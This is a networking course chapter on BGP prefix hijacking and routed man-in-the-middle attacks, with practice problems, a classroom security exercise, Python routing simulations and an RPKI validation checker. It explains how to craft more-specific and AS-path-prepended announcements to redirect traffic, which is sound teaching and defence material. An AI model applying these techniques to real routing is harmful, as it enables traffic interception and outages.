How might the PTA craft a BGP route announcement from Router 3 of AS2003 to alter this behavior? Again, because all routers apply the longest-prefix-match principle, the PTA will force Router 3 to advertise a more specific network ID containing the IP address of the MidTube webserver. As each neighboring AS learns of the new, more specific network prefix, it will apply its own BGP path selection algorithm and forward BGP updates across the Internet, promulgating the PTA's false information.

Practice Problem 18.2
What is the first and last IP address of the 17.17.200.0/24 network where the MidTube webserver is located?
(a) First Address:
(b) Last Address:

What network ID and mask should the PTA choose? Are there other options available?
Solution:

What is the first and last address of the false network the PTA advertised?
(a) First Address:
(b) Last Address:

Does the IP address of the MidTube webserver fall within the IP address block that the PTA advertised?
Solution:

Finally, given this false BGP route announcement from Router 3 of AS2003, what path will all packets leaving AS2016 take in order to reach the MidTube webserver at 17.17.200.2?
[Network diagram: as in Practice Problem 18.1, with Router 3 of AS2003 additionally announcing: Network: 17.17.200.0/25, AS-Path: 2003.]

2. Why Does This Work?

There are two reasons why prefix hijacking is possible in BGP:
1) There is no method within BGP to authenticate which network prefixes have been allocated to Autonomous System Numbers (ASNs).
2) There is no method within BGP to authenticate which network prefixes may be originated by an ASN.

This point bears repeating: BGP does not provide a mechanism to authenticate the allocation or origin of a network prefix to an ASN. Instead, AS network operators must trust the network reachability information that other ASes provide, specifically, where a prefix originates and who it has been allocated to. Without trusting this information, it is impossible to identify how to reach other networks of interest. This mutual trust defines the nature of Internet routing.

Hopefully, it is clear that this issue is of great concern. The security of Internet routing depends on the accuracy, integrity, and availability of the association between ASNs and the network prefixes they own and advertise. If this information is lost, corrupted, or destroyed, the Internet will fail to function as a whole. At the start of Part II (The Network), in Chapter 11, we saw one example of how devastating this can be. YouTube was taken off the Internet on Sunday, February 24, 2008, for roughly two hours, as a result of an order from the Pakistan Telecommunication Authority.
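The reason a bogus /25 wins over the legitimate /24 is the longest-prefix-match rule, which the chapter names but does not show in operation. The Python below is an added example written for these notes, not code from the course or from any router. The two prefixes and origin ASNs are the ones in the diagrams above (AS2005's 17.17.200.0/24 and AS2003's 17.17.200.0/25); the probe addresses are constructed. Beyond the specific case in the text, hijack_scope reports, for any victim/hijacker prefix pair, which part of the victim's block is captured and which part the legitimate announcement still serves.

```python
"""
Added example (not from the EC310 notes): longest-prefix matching, the rule
that lets a more specific announcement hijack part of a legitimately announced
block. Prefixes and origins are those shown in this chapter; probe addresses
are constructed. Requires Python 3.9+.
"""
import ipaddress
from typing import Optional

# Route table as seen by a victim router: prefix -> originating ASN.
BEFORE_HIJACK = {"17.17.200.0/24": 2005}
AFTER_HIJACK = {"17.17.200.0/24": 2005, "17.17.200.0/25": 2003}


def longest_prefix_match(table: dict[str, int], dst: str) -> Optional[tuple[str, int]]:
    """Return (prefix, origin ASN) of the most specific entry containing dst.

    A router does not ask which entry is 'legitimate'; among all entries that
    contain the destination it simply takes the one with the longest mask.
    """
    ip = ipaddress.ip_address(dst)
    best = None
    for prefix, origin in table.items():
        net = ipaddress.ip_network(prefix)
        if ip in net and (best is None or net.prefixlen > best[0].prefixlen):
            best = (net, origin)
    return (str(best[0]), best[1]) if best else None


def origin_for(table: dict[str, int], dst: str) -> Optional[int]:
    """ASN whose announcement will actually carry packets for dst."""
    match = longest_prefix_match(table, dst)
    return match[1] if match else None


def hijack_scope(victim_prefix: str, bogus_prefix: str) -> Optional[dict]:
    """Describe what a more specific announcement steals from victim_prefix.

    Returns None if bogus_prefix is not a sub-block of victim_prefix: an
    announcement that is not more specific does not win on mask length, and
    the router falls back to ordinary path selection between equals.
    """
    victim = ipaddress.ip_network(victim_prefix)
    bogus = ipaddress.ip_network(bogus_prefix)
    if not bogus.subnet_of(victim):
        return None
    return {
        "hijacked": str(bogus),
        "first": str(bogus[0]),
        "last": str(bogus[-1]),
        # Sub-blocks of the victim's prefix the bogus announcement does not
        # cover; the legitimate announcement still wins for these addresses.
        "untouched": [str(n) for n in victim.address_exclude(bogus)],
    }


if __name__ == "__main__":
    for dst in ("17.17.200.2", "17.17.200.200"):   # constructed probe addresses
        print(dst, "before:", origin_for(BEFORE_HIJACK, dst),
              "after:", origin_for(AFTER_HIJACK, dst))
    print(hijack_scope("17.17.200.0/24", "17.17.200.0/25"))
```

Note that an address in the upper half of the /24 is untouched by a single /25 announcement; a hijacker wanting the whole block would have to announce both halves (or a longer list of more specific prefixes), which is the "other options" question Practice Problem 18.2 raises.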
Similar to the Professional Teaching Association's actions in Security Exercise 17, Pakistan Telecom, acting on the Authority's order, announced a more specific network prefix which contained YouTube's IP address space. This more specific advertisement created a 'black hole' into which the majority of Internet traffic destined for YouTube was misdirected. Fortunately, their mistake was not malicious in nature, but that does not mean others will not be in the future.

If Internet routing is so vulnerable, who or what keeps the Internet up and running? The successful, reliable operation of Internet routing is a testament to the many AS network operators responsible for inter-domain routing. In addition, many others are heavily invested in the development of the Internet and its safe and effective operation. Specifically, the Internet Engineering Task Force (IETF), an international collection of academic researchers, network operators, equipment manufacturers, and others, has made it their sole mission to simply "make the Internet work better." To do this, these volunteers produce engineering documents called Requests For Comments (RFCs) that define the operation of the Internet's protocols. Through open dialogue, technical competence, protocol ownership, rough consensus and running code, they work hard to guide the technical architecture and keep the Internet up and running daily. To learn more about the IETF, see http://www.ietf.org.

3. MidTube is Back!

Speaking of up and running, it looks like MidTube is back! Let's break for Part 1 and Part 2 of the Security Exercise. After these parts are complete, we'll return to your regularly scheduled lecture.

Security Exercise 18: Part 1 and Part 2

II. Stealing the Internet: Route Attribute Manipulation

1. Sir/Ma'am, Please Give Me My Password Back

Prof. Evil and the PTA are back at their old tricks again!
This time, rather than simply shutting down MidTube, they were able to place themselves between you and the MidTube webserver. From that vantage point, they observed all traffic destined for 17.17.200.0/24 and identified those who were enjoying themselves rather than paying attention in class. Let’s take a closer look at how your instructor was able to recover your MidTube username and password and how BGP enabled this.

Practice Problem 18.3

Consider the network diagram and BGP route announcement from Router 3 of AS2003 below. Assuming no local preferences are set, for every AS, draw the path that AS would select to reach 17.17.200.2 beginning with the AS router and ending with the MidTube webserver.

[Network diagram of the EC310 internet, as in Security Exercise 17 (AS 2016 with R16, RA and RC; AS 20 R20; AS 30 R30; AS 40 R40; AS 50 R50; AS 60 R60; AS 2003 R3 with www.pta.net 21.200.3.2 in 21.200.3.0/24; AS 2005 R5 with www.midtube.com 17.17.200.2 in 17.17.200.0/24). Announcements shown: from Router 3 of AS 2003, Network: 17.17.200.0/25, AS-Path: 2003-60-2005; from AS 2005, Network: 17.17.200.0/24, AS-Path: 2005.]

What path will AS60 select in order to reach 17.17.200.2?
Solution:

Why would AS60 choose this path?
Solution:

What does the attacker gain by prepending AS60 to their route announcement?
Solution:

What path will AS2005 select in order to reach 17.17.200.2?
Solution:

Why would AS2005 choose this path?
Solution:

What does the attacker gain by prepending AS2005 to their route announcement?
Solution:

What additional actions must the attacker take in order to complete the MITM attack?
Solution:

Finally, what path will all packets leaving AS2016 take in order to reach the MidTube webserver at 17.17.200.2?
Solution:

There are several elements of this routed wide area MITM attack that are important to understand:35

First and foremost, in order for it to work, there is a portion of the Internet that must be given up as the back path (i.e., the ‘correct’ path) to the target. In this example both AS60 and AS2005 fulfill this role and are deliberately chosen by the PTA to let the victim eventually reach their destination. Therefore, traffic originating from AS60 and AS2005 is not forced through AS2003, unlike traffic from the other ASes across the EC310 internet. Similarly, on the real Internet, an attacker needs to plan his back path appropriately. Surprisingly, there are actually a small number of ASes to choose from. Although the Internet continues to grow daily, the number of ASes between any set of prefixes is still relatively small. As of October 2014, the average AS path length was 3.7891. That is, the ‘diameter’ of the Internet is approximately four ASes wide.

Second, this attack combines the use of a more specific network prefix with the modification of BGP route attributes to control the direction of traffic. The PTA is intentionally prepending (i.e., putting in front) its ASN to the chosen back path to take advantage of a distinct feature of the BGP path selection algorithm: an AS will not accept a route that includes its own ASN in the path. Recall from Chapter 17 that this feature of BGP is intended to prevent routing loops. Here, it is twisted for malicious purposes. Of course, once you understand how a lock operates, you realize there is more than a key that can open a door.

Third, to complete the MITM attack, the attacker must also place a static route within their AS to forward traffic to the final destination.

35 Originally proposed and demonstrated live at DEFCON 16 on 10 August, 2008 by Anton (Tony) Kapela and Alex Pilosov. See https://www.youtube.com/watch?v=S0BM6aB90n8 for more details.
It is not enough to simply redirect all traffic to the attacker’s AS. The attacker has to connect the forward path to the back path of the final destination. A static route provides this connection. A static route is a manually configured entry in a router about the location of a network. When a router learns about the same network through multiple sources, like the Open Shortest Path First (OSPF) protocol and distance vector routing, a static route has the highest priority. Therefore, the router will use the static route over the other learned routes to reach the same network.

Fourth, while certainly clever, there is a large signature associated with this kind of attack due to its potential global impact across the Internet. If it has a significant effect on consumers or providers, network operators often deal with it as soon as possible. Thus, attacks typically last from several minutes to hours. Still, occurrences are not infrequent. A recent report commissioned by the FCC estimated that route hijackings or similar BGP incidents occur once or twice per month, but whether or not the hacker’s intentions are malicious is very difficult to ascertain.36 Interestingly, BGP attacks of a smaller scale (i.e., dealing with only a handful of prefixes) generally go unnoticed. For example, email spammers commonly hijack IP address space to send their unwanted traffic and then disappear. Various techniques have been proposed on how to hide as the man in the middle during a routed wide area attack, but the technical details of their implementation are beyond the scope of this course.

Finally, the astute midshipman may realize that the aforementioned MITM attack only redirects traffic in the forward direction. That is, traffic leaving AS2016 destined for the MidTube webserver would be forced through AS2003, while traffic leaving AS2005 destined for AS2016 would not be forced through AS2003. The MidTube webserver will respond to all web requests via a separate path chosen by Router 5 of AS2005.
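The following Python model is added here as an illustration and is not from the course notes; its topology, prefixes and static route are constructed assumptions, not the EC310 diagram. It applies the rules just described (longest prefix match, shortest AS path, rejection of any path containing the receiving AS’s own ASN, static route priority) and reports which ASes end up forwarding toward AS2003 and which back-path ASes keep the legitimate route, which is exactly what an operator compares when investigating why a more-specific announcement moved traffic.

```python
import ipaddress
from collections import defaultdict

# Constructed topology for this example (an assumption; not the exact EC310
# diagram). Each pair is a BGP peering between two ASes.
LINKS = {(2016, 20), (2016, 30), (20, 40), (20, 50), (30, 2003), (40, 2003),
         (2003, 60), (60, 50), (60, 2005), (50, 2005)}
NEIGHBORS = defaultdict(set)
for a, b in LINKS:
    NEIGHBORS[a].add(b)
    NEIGHBORS[b].add(a)

# Announcements as originated. AS2005 legitimately owns 17.17.200.0/24,
# AS2016 is assumed to own 2.2.2.0/29, and AS2003 injects the more specific
# /25 with the back path (AS60, AS2005) prepended, as in Practice Problem 18.3.
ORIGINATED = {
    2005: [("17.17.200.0/24", (2005,))],
    2016: [("2.2.2.0/29", (2016,))],
    2003: [("17.17.200.0/25", (2003, 60, 2005))],
}
# The static route in AS2003 that joins the forward path to the back path.
STATIC = {2003: {"17.17.200.0/25": 60}}


def converge(originated):
    """Return rib[asn][prefix] = (as_path, next_hop_asn) after propagation.
    Rules modelled: an AS rejects any path containing its own ASN (loop
    prevention), keeps the shortest AS path per prefix, never replaces a
    locally originated route, and re-advertises its best path to every
    neighbour with its own ASN prepended. next_hop_asn is None for routes
    the AS originates itself."""
    rib = {asn: {} for asn in NEIGHBORS}
    for asn, routes in originated.items():
        for prefix, path in routes:
            rib[asn][prefix] = (tuple(path), None)
    changed = True
    while changed:                      # stops once no shorter path appears
        changed = False
        for asn in sorted(NEIGHBORS):
            for prefix, (path, nh) in list(rib[asn].items()):
                adv = path if nh is None else (asn,) + path
                for nbr in sorted(NEIGHBORS[asn]):
                    if nbr in adv:
                        continue        # loop prevention: own ASN in the path
                    cur = rib[nbr].get(prefix)
                    if cur is None or (cur[1] is not None and len(adv) < len(cur[0])):
                        rib[nbr][prefix] = (adv, asn)
                        changed = True
    return rib


def next_hop(rib, asn, dst_ip):
    """Longest-prefix match in one AS's RIB -> (network, next_hop_asn)."""
    ip = ipaddress.ip_address(dst_ip)
    best = None
    for prefix, (_path, nh) in rib[asn].items():
        net = ipaddress.ip_network(prefix)
        if ip in net and (best is None or net.prefixlen > best[0].prefixlen):
            best = (net, nh)
    return best


def trace(rib, src, dst_ip, static=STATIC, max_hops=10):
    """List the ASes a packet crosses from src to the AS that originates
    dst_ip. A static route overrides the BGP choice, as the chapter notes."""
    hops, asn = [src], src
    while len(hops) <= max_hops:
        match = next_hop(rib, asn, dst_ip)
        if match is None:
            return hops + ["unreachable"]
        net, nh = match
        nh = static.get(asn, {}).get(str(net), nh)
        if nh is None:
            return hops                 # reached the originating AS
        hops.append(nh)
        asn = nh
    return hops + ["loop"]


def redirected_ases(rib, hijack="17.17.200.0/25"):
    """ASes that installed the more specific prefix from a neighbour."""
    return sorted(a for a in rib if hijack in rib[a] and rib[a][hijack][1] is not None)


if __name__ == "__main__":
    rib = converge(ORIGINATED)
    print("ASes forwarding toward AS2003:", redirected_ases(rib))
    print("AS2016 -> MidTube:", trace(rib, 2016, "17.17.200.2"))
    print("AS60 -> MidTube:", trace(rib, 60, "17.17.200.2"))
    print("MidTube -> AS2016 (reverse):", trace(rib, 2005, "2.2.2.1"))
```

Note that AS2016 holds a shorter path to the legitimate /24 (20-50-2005) than to the /25 (30-2003-60-2005), yet the more specific prefix wins; the reverse trace never touches AS2003, matching the forward-only behaviour described above.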
For brevity, it is left to the reader to determine the appropriate BGP route announcement that AS2003 should make to intercept traffic in the reverse direction. See Security Exercise 18 extra credit opportunities for details.

2. Why Does This Work?

In addition to the two reasons mentioned previously, there is one more reason why this type of MITM attack is possible in BGP: there is no method within BGP to authenticate the route attributes provided by an AS. This point bears repeating: BGP does not provide a mechanism to authenticate the route attributes associated with the announcements of an AS. This means that an AS can announce whatever attributes it would like about any network prefix, regardless of the prefix’s origin, including the AS path length. As before, this has a significant impact on the security of Internet routing. Not only is it possible for an AS to originate a network prefix without authorization, but any AS along the path can modify the attributes associated with a network prefix at any point. Therefore, the security of Internet routing depends on the ability to authenticate the route attributes provided by an AS.

Practice Problem 18.4

What makes route attribute manipulation possible in BGP?
Solution:

What is required in order to secure Internet routing from route attribute manipulation?
Solution:

In some contexts, modification of route attributes is used for good. For example, inflating the AS path length of a network prefix is a common technique used in traffic engineering. However, as we have just seen, it can also be used for malicious purposes. This leads us to the final question of the networking section: What solutions are available to secure Internet routing?

III. The Path Towards Secure Internet Routing

1. The Problem

As previously mentioned, the primary vulnerability of the Internet routing system is a lack of means to authenticate the ASNs, network prefixes, and route attributes provided by others.
36 See Secure BGP Deployment Final Report by the FCC’s CSRIC III, Working Group 6, March, 2013 for more details.

Without an objective baseline to compare against, network operators are left to fend for themselves as to whom and what they believe. This is made more difficult by a number of other issues:

First, compounding the problem is the fact that the Internet routing system grows on a daily basis. The exponential growth of the BGP IPv4 routing table is illustrated in Figure 1. The number of active BGP entries (i.e., currently advertised network prefixes) is on the vertical axis and the date in years is on the horizontal axis. Consider the number of prefixes advertised today (~520,000) relative to the number of prefixes advertised in 1999 (~70,000). Such nonlinear growth makes the challenge to sort fact from fiction immense, especially given that any one of these prefixes may be malicious in nature.

Figure 1 – The number of active BGP entries versus the date in years.

Second, exacerbating things further is the fact that the number of ASes in the Internet has also increased linearly over time. This rate of increase is evidenced by the positive slope of the line in Figure 2. The number of unique ASes is on the vertical axis and the date in years is on the horizontal axis. Again, when comparing the number of ASes today (~48,660) relative to the number of ASes in 1999 (~4,400), there is an order of magnitude difference. As more ASes are introduced every day, the challenge to distinguish between true and false advertised information grows more difficult. If even one AS is successful in sending malicious information, it could alter the flow of traffic across the entire Internet.

Figure 2 – The number of unique ASes versus the date in years.

Third, who is responsible for the Internet anyway? While the organizations (IANA, IETF, etc.)
we have discussed thus far are heavily involved in making the Internet function better, none of them have the authority to administer punishment for abuse of the network. Part of the celebrated history of the Internet is its free and open nature in which anyone can connect and share with others. Moreover, many non-profit organizations, private corporations, and governments wish for it to remain a free domain and may reject any security solution which does not preserve these principles.

Lastly, when considering any security vulnerability, the financial cost to fix the problem is a considerable factor in driving how quickly any solution may be adopted. It is one thing to tell all AS network operators to secure their networks, but it is an entirely different matter to determine who is going to pay for it. Unfortunately, the full details of these policy, financial, and governmental issues are outside the scope of this course, but nevertheless they have a significant impact on the security of Internet routing.

2. The Solution

There are three technical solutions that AS network operators can use right now to combat the issues which have been identified in this chapter: 1) Filtering,37 2) Internet Routing Registries,38 and 3) Resource Public Key Infrastructure (RPKI).39 BGP security remains an active area of research and alternative solutions may be available in the future.

Filtering. Best current practices for AS network operators dictate the use of filters at AS borders to reject suspicious route announcements or alter malicious route attributes.
Filters are manually established based on the routing policies of an organization and are commonly used to:

1) prevent private IP addresses and other special use addresses from being routed across the Internet;
2) remove routes with exceptionally long AS paths;
3) limit the number of network prefixes introduced in the global BGP routing table by their mask length (e.g., do not advertise a network greater than /24);

along with many other purposes. ISPs have the ability to filter their customers’ routes because they often have direct knowledge of what IP addresses they have allocated to their customers and which ASes should be announcing their prefixes. Information from stub ASes can be readily authenticated because they should have a limited number of advertisements and exchange this information with only one ISP. The real trouble is introduced not at the ‘edge’ of the Internet with stub ASes, but from multihomed and transit ASes which are farther away from one another. That is, it is very hard for an ISP to filter the routes of another ISP that has its own set of customers, policy constraints, and geographic concerns.40

It is important to understand that filtering has both a business cost and a computational cost associated with it. If an ISP filters too aggressively, it may prevent customers from reaching legitimate destinations. Unhappy customers could lead to a loss of revenue. There is also an intensive amount of manual labor required to create and maintain these filters, which also costs an organization time and money. The routers performing the filtering must also be able to store all of the policies of an organization along with their routing tables and respond to dynamic changes in the Internet’s topology. As an example of how frequently Internet routing data can change, consider the peak BGP update rate over a seven-day period in October 2014 shown in Figure 3.
At its peak, over 4000 BGP update messages and over 6000 BGP route withdrawals were sent per second. Each update or withdrawal could cause the BGP path selection algorithm to run against the organization’s policies and consume a large amount of CPU processing time. To help meet this significant computational demand, routers use a special type of memory called Ternary Content Addressable Memory (TCAM), which is much more expensive than the common RAM which we learned about in Chapter 1. Thus, the cost of the individual router increases as the demands of filtering expand. Hopefully it is clear that the consequences of filtering are significant and not a trivial matter to implement or maintain.

Figure 3 – Peak prefix update rate per second versus the date in years.

Furthermore, for filtering to work effectively, everyone must do it and do it with an equally strict level of scrutiny. How likely do you think it is that all ISPs in all countries will meet the same high standard? If even one falls short, or one router in one ISP is compromised, a malicious routing entry can corrupt the global BGP table.

Internet Routing Registries. The first efforts to establish a baseline for the Internet routing system are the Internet Routing Registries. The idea behind them is very simple. They are repositories of the IP prefixes, ASNs, routing policy, network topology, and human points of contact for those ASes which choose to register their information.

37 As proposed in A Survey of BGP Security Issues and Solutions by Butler et al., January, 2010.
38 As proposed in the Secure BGP Deployment Final Report by the FCC’s CSRIC III, Working Group 6, March, 2013.
39 See RFC 6480 (http://tools.ietf.org/html/rfc6480) for more details.

These databases can be
queried by any AS through an application separate from BGP to authenticate the routing information received via BGP. ASes may use this information to construct their BGP filters in order to screen malicious or erroneous advertisements from others. Often ISPs will require their customers to register their prefixes in an IRR before the ISP will even announce the customer’s prefix onto the Internet. Again, this solution works well at the ‘edge’ of the Internet but becomes increasingly difficult when stub ASes are not considered. While this method may be effective, the downside is that these registries are only effective if the registry data is secure, complete, and accurate, which is currently not guaranteed.41 Additionally, even the Regional Internet Registries (RIRs) do not always have accurate records of the organizations and their allocated IP addresses. Over time businesses change ownership, sub-divide, or enter bankruptcy, invalidating the original IP address allocation data. Additionally, because an organization’s routing policy and network topology are considered private property, organizations do not have an incentive to update their information in either the IRRs or with the RIRs. For example, a company like Netflix aims to keep the information about how it connects with other ISPs private to maintain an advantage over its competitors. Thus, they are unlikely to update their IRR or RIR information.

Resource Public Key Infrastructure (RPKI). Since the security of Internet routing necessitates secure, complete, and accurate routing information, the most current ideal solution is the Resource Public Key Infrastructure (RPKI).

40 See “How Egypt did (and your government could) shut down the Internet” for more details (http://arstechnica.com/tech-policy/2011/01/how-egypt-or-how-your-government-could-shut-down-the-internet/).
This was recently made available by all of the RIRs in 2011.42 Similar to the IRRs, RPKI is a repository of Internet routing information. The key difference is that it uses the X.509 certificate system to provide cryptographic assurance of:

1. The association between an ASN and the IP prefixes it has been allocated.
2. The association between an ASN and the IP prefixes it is authorized to originate.

This is the same idea as when you establish a secure connection with a website. When the lock icon closes in your browser and you establish a secure connection with a website, you know that the public key used to transfer a symmetric encryption key belongs to a particular domain name. With RPKI, a router can likewise know whether the IP prefixes that are advertised by an ASN may be originated by that ASN. This point bears repeating: RPKI only provides cryptographic assurance of the association between 1) an ASN and the IP prefixes it has been allocated and 2) an ASN and the IP prefixes it is authorized to originate. It accomplishes the second objective through Route Origin Authorizations (ROAs), which attest to which ASN can originate an IP prefix (or prefixes). ROAs are digitally signed by the prefix owner to certify which ASN may originate that IP address space. Unlike the IRRs, the timeliness of the information in the RPKI database can be validated by checking a certificate’s expiration date. In fact, there is a direct mechanism for authorized address holders to revoke certificates to preserve the integrity of the database.

More importantly, notice what is absent in RPKI. There is nothing in RPKI which validates the route attributes, including the AS path, associated with a BGP route announcement from an AS. Nor does it provide certainty that the AS which has registered its information used the correct ASN or set of prefixes. Nor does it provide network topology information or human points of contact as with the IRRs.
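As an added example (not part of the course notes), the following Python puts the three border filters listed under Filtering and RPKI route origin validation together into one ingress check; the ROA data, filter thresholds and announcements are constructed for the example, and the valid/invalid/not-found states follow RFC 6811. It also makes the gap just described concrete: origin validation looks only at the prefix and the rightmost ASN, so a forged AS path that ends in the legitimate origin is caught only by the ROA’s maximum length or the mask-length filter, never by any check of the path itself.

```python
import ipaddress
from dataclasses import dataclass


@dataclass(frozen=True)
class ROA:
    """Route Origin Authorization: origin_as may announce prefix and any more
    specific prefix no longer than max_length."""
    prefix: str
    max_length: int
    origin_as: int


# Constructed ROA data for this example (assumed, not real RPKI data):
# AS2005 holds 17.17.200.0/24 and authorizes nothing more specific.
ROAS = [ROA("17.17.200.0/24", 24, 2005), ROA("21.200.3.0/24", 24, 2003)]

# Assumed local thresholds for the three filters named in the chapter.
MAX_PATH_LEN = 10
MAX_PREFIX_LEN = 24


def prefix_filter(prefix, as_path, max_path=MAX_PATH_LEN, max_len=MAX_PREFIX_LEN):
    """Return None if the announcement passes the border filters, otherwise the
    reason it is dropped: special-use address space, a prefix more specific
    than the mask-length limit, or an exceptionally long AS path."""
    net = ipaddress.ip_network(prefix)
    if not net.is_global:           # RFC 1918 space, loopback, link-local, ...
        return "special-use or private address space"
    if net.prefixlen > max_len:
        return f"prefix more specific than /{max_len}"
    if len(as_path) > max_path:
        return f"AS path longer than {max_path}"
    return None


def origin_validate(prefix, as_path, roas=ROAS):
    """RPKI origin validation: compare only the announced prefix and the
    rightmost (origin) ASN of the path, which is all a ROA attests to."""
    net = ipaddress.ip_network(prefix)
    origin = as_path[-1]
    covering = [r for r in roas if net.subnet_of(ipaddress.ip_network(r.prefix))]
    if not covering:
        return "not found"          # no ROA covers this prefix at all
    if any(r.origin_as == origin and net.prefixlen <= r.max_length for r in covering):
        return "valid"
    return "invalid"                # covered, but wrong origin or too specific


def ingress_decision(prefix, as_path, roas=ROAS):
    """Filters first, then origin validation. Policy assumed here: accept
    'valid' and 'not found', reject 'invalid'."""
    reason = prefix_filter(prefix, as_path)
    if reason is not None:
        return ("reject", f"filter: {reason}")
    state = origin_validate(prefix, as_path, roas)
    if state == "invalid":
        return ("reject", "origin validation: invalid")
    return ("accept", f"origin validation: {state}")


# Constructed announcements: the legitimate /24, the SX17 and SX18 hijacks,
# a wrong-origin /24, private space, an unregistered prefix, a padded path.
ANNOUNCEMENTS = [
    ("17.17.200.0/24", (2005,)),
    ("17.17.200.0/25", (2003,)),                         # SX17: wrong origin
    ("17.17.200.0/25", (2003, 60, 2005)),                # SX18: forged path
    ("17.17.200.0/24", (2003,)),
    ("10.0.0.0/8", (40,)),
    ("4.4.4.0/24", (30,)),
    ("21.200.3.0/24", tuple(range(100, 111)) + (2003,)),  # 12-hop path
]

if __name__ == "__main__":
    for prefix, path in ANNOUNCEMENTS:
        print(prefix, "-".join(map(str, path)), ingress_decision(prefix, path))
    # The limitation the chapter points out: a ROA that permitted a /25 would
    # call the forged-path hijack 'valid', because its rightmost ASN is 2005.
    loose = [ROA("17.17.200.0/24", 25, 2005)]
    print("forged path with loose ROA:",
          origin_validate("17.17.200.0/25", (2003, 60, 2005), loose))
```

The practical lesson for an address holder is to keep a ROA’s maximum length as tight as the prefixes actually announced, since the origin check cannot tell a forged path from a real one.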
Lastly, it does not mandate that network operators use this information when constructing their filters. How RPKI is applied is entirely dependent on what AS network operators choose to do with the information available. The hope is that, as trust in RPKI increases, network operators will use it more often to certify their IP resources while furthering its use in their networks.

However, as with any new, large scale and complex system, new vulnerabilities may be introduced. For example, at any time any authorized address holder can revoke the certificates of those to whom they have sub-allocated their address space. Initially, this may appear like a smart and convenient method for an ISP to control negligent or irresponsible customer behavior. However, if an ISP or a country wanted to restrict Internet access for a group of people, abuse of the RPKI Certificate Revocation List (CRL) could provide a way of doing so.

Practice Problem 18.5

Briefly describe two technical solutions to prevent manipulation of the Internet routing system.
Solution:

Briefly describe the negative and positive consequences of these two solutions for secure Internet routing.
Solution:

41 A Survey of BGP Security Issues and Solutions by Butler et al., January, 2010.
42 Some RIRs began offering RPKI as early as

3. See For Yourself

At this point, we’ll head out on to the real Internet and wrap up Part 3 of the Security Exercise. After the Security Exercise is done, we’ll complete your regularly scheduled lecture.

Security Exercise 18: Part 3

IV. Conclusion

Communication is an inherently insecure process. It is never a question of how to make communication perfectly secure, but it is a question of how to mitigate the risks to an acceptable level for the parties involved. To help make this fundamental principle clear, let’s strip away all the complexity in computer communications that we have introduced to date.
Hopefully, we have shown you that complexity (e.g., routers, protocols, network addressing schemes, etc.) can create vulnerabilities. However, even the most simplistic forms of communication are still inherently insecure, but to understand how requires a bit more understanding of how the electromagnetic spectrum works. That is, before we can become a locksmith (of wireless communication), we need to know a bit more about how the lock (the electromagnetic spectrum) operates.

Problems

1. What is an IP prefix?
a. The network ID.
b. 200.15.78.128/25
c. The range of IP addresses assigned to a network.
d. All of the above.

2. As an Autonomous System (AS), what is the difference between originating an IP prefix and being allocated an IP prefix?

3. What are Border Gateway Protocol (BGP) route attributes and what are they used for in BGP?

4. What defines the nature of Internet routing?

5. Two types of attacks were discussed in Chapter 18: 1) route hijacking and 2) the routed wide area MITM attack. What is the difference in how BGP is exploited in each attack?

6. What information is required to secure Internet routing?

7. What is the most current ideal solution to secure Internet routing?

8. Who is responsible for implementing the technical solutions to secure Internet routing proposed in Chapter 18?

9. What makes securing Internet routing so difficult today and in the future?

10. Filtering was mentioned as one of the technical solutions to a routed wide area Man-In-The-Middle (MITM) attack. What is one negative consequence of filtering?

11. What must be true for filtering to be effective in securing Internet routing?

12. Why is filtering so difficult to implement and maintain?

13. How is RPKI different than the Internet Routing Registries (IRRs)?

14. RPKI was proposed as one technical solution to secure Internet routing.
It uses cryptography to provide assurance of the association between:
1) ________________________________ and _____________________________________
2) ________________________________ and _____________________________________

15. What tool does RPKI provide to attest to what ASNs can originate which IP prefixes?

16. Even if using filtering, the IRRs, and RPKI, what aspect of BGP is still vulnerable to manipulation?

17. What is the fundamental principle of communication as it relates to security?

18. What IP prefix and AS path should Router 50 announce to hijack the Midtrest webserver?

19. Consider the network diagram and BGP route announcement from Router 50 of AS50 below. AS10 is a multihomed AS. Assuming no local preferences are set, for every AS, draw the path that AS would select to reach 30.31.51.10 beginning with the AS router and ending with the Midtrest webserver.

[Network diagram for Problems 18 and 19: AS 10 (R10, multihomed), AS 20 (R20, 1.2.3.0/24), AS 30 (R30), AS 40 (R40, www.midtrest.com at 30.31.51.10 in 30.31.32.0/19), AS 50 (R50) and AS 70 (R70), joined by /30 point-to-point links. Announcements shown: from AS 40, Network: 30.31.32.0/19, AS-Path: 40; from Router 50 of AS 50, Network: 30.31.48.0/20, AS-Path: 50-70-40.]

Security Exercise 18

Part 1: Initial Setup

Now that we understand how the Internet is put together, let’s take a closer look at how it can be pulled apart.

1. Set-Up

Yes, I take Movember very seriously, and if you seriously want to be an Astronaut, you should know who I am and what I do now. Remember, ’68 is great!

Equipment needed:

A printed or electronic copy of this security exercise.
o If printed, separate the network diagram and answer sheet at the back of this exercise and have them ready to fill in.

Your issued laptop.
o Ensure Chrome or Firefox is installed on your Windows computer.
o Turn up the volume on your computer.
o Turn off the wireless adapter.
o Connect the blue Ethernet cable at your desk to your issued laptop.
o Wait for an IP address to be assigned to your LAN interface.
o Verify by pressing the Windows Orb key and, in the program search bar, typing cmd. Hit enter to launch the Windows terminal and then, at the command prompt, execute ipconfig. Now, your screen should look similar to the figure below. Your Ethernet adapter should be assigned an IP address of 192.168.XX.YYY, where XX is your classroom number and YYY is a number between 101 and 254. If not, notify your instructor or lab technician.

Part 2: We Want MidTube!

1. MidTube is Back!

When we last left off in SX#17, MidTube had been shut down by the Professional Teaching Association (PTA) at the request of Prof. Evil. This ban would not be lifted until a thorough review of the Rectabular Excrusion Bracket was accomplished by all EC310 midshipmen. To pull off their block, the PTA advertised a more specific network prefix which contained the address of the MidTube webserver. This forced all traffic destined for MidTube across the EC310 internet to be redirected to AS2003. As you just learned in lecture, this type of attack is commonly referred to as prefix hijacking.

Question 1: What feature of BGP makes it possible for the PTA to hijack MidTube?

Question 2: What is required to secure Internet routing from prefix hijacking?

Have no fear. The Superintendent heard word from the Brigade of Prof. Evil’s heartless actions. In fact, several bitter, angry midshipmen stormed his office over the weekend to complain; and, as you well know, if there is one thing we cannot have at the Naval Academy, it is cynical midshipmen. Therefore, the Superintendent quickly took action and directed Prof. Evil to restore MidTube immediately or face disciplinary action. Thwarted yet again, Prof. Evil reluctantly agreed and contacted the PTA to remove the block.

Now, once again, for your viewing pleasure, visit http://www.midtube.com.

Access the website www.midtube.com by opening Firefox or Chrome on your Windows computer (i.e., not your Cyber2 VM) and navigating to the website address.
Log in by creating a username and password of your choice (do not use a username or password you would not like exposed). Browse the website to see what information is available.

Question 3: Gasp… what shocking event just happened?

